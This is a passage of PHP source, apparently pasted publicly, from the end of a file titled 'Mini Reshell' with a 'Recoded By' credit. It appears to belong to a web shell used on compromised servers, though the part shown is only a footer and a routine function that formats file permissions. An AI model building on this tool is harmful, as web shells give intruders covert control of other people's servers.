  777. </div><br><br><center><b><font color=red>&copy 2020 - 2021 Recoded By <?php echo $nick; ?></font></center><b>
  778. <br><center><?php echo $nick; ?> Mini Reshell</center>
  779.  
  780. <?php
  781. //permision
  782. function perms($file){
  783. $perms = fileperms($file);
  784.  
  785. if (($perms & 0xC000) == 0xC000) {
  786. // Socket
  787. $info = 's';
  788. } elseif (($perms & 0xA000) == 0xA000) {
  789. // Symbolic Link
  790. $info = 'l';
  791. } elseif (($perms & 0x8000) == 0x8000) {
  792. // Regular
  793. $info = '-';
  794. } elseif (($perms & 0x6000) == 0x6000) {
  795. // Block special
  796. $info = 'b';
  797. } elseif (($perms & 0x4000) == 0x4000) {
  798. // Directory
  799. $info = 'd';
  800. } elseif (($perms & 0x2000) == 0x2000) {
  801. // Character special
  802. $info = 'c';
  803. } elseif (($perms & 0x1000) == 0x1000) {
  804. // FIFO pipe
  805. $info = 'p';
  806. } else {
  807. // Unknown
  808. $info = 'u';
  809. }
  810.  
  811. // Owner
  812. $info .= (($perms & 0x0100) ? 'r' : '-');
  813. $info .= (($perms & 0x0080) ? 'w' : '-');
  814. $info .= (($perms & 0x0040) ?
  815. (($perms & 0x0800) ? 's' : 'x' ) :
  816. (($perms & 0x0800) ? 'S' : '-'));
  817.  
  818. // Group
  819. $info .= (($perms & 0x0020) ? 'r' : '-');
  820. $info .= (($perms & 0x0010) ? 'w' : '-');
  821. $info .= (($perms & 0x0008) ?
  822. (($perms & 0x0400) ? 's' : 'x' ) :
  823. (($perms & 0x0400) ? 'S' : '-'));
  824.  
  825. // World
  826. $info .= (($perms & 0x0004) ? 'r' : '-');
  827. $info .= (($perms & 0x0002) ? 'w' : '-');
  828. $info .= (($perms & 0x0001) ?
  829. (($perms & 0x0200) ? 't' : 'x' ) :
  830. (($perms & 0x0200) ? 'T' : '-'));
  831.  
  832. return $info;
  833. }
  834. ?>
Add Comment
Please, Sign In to add comment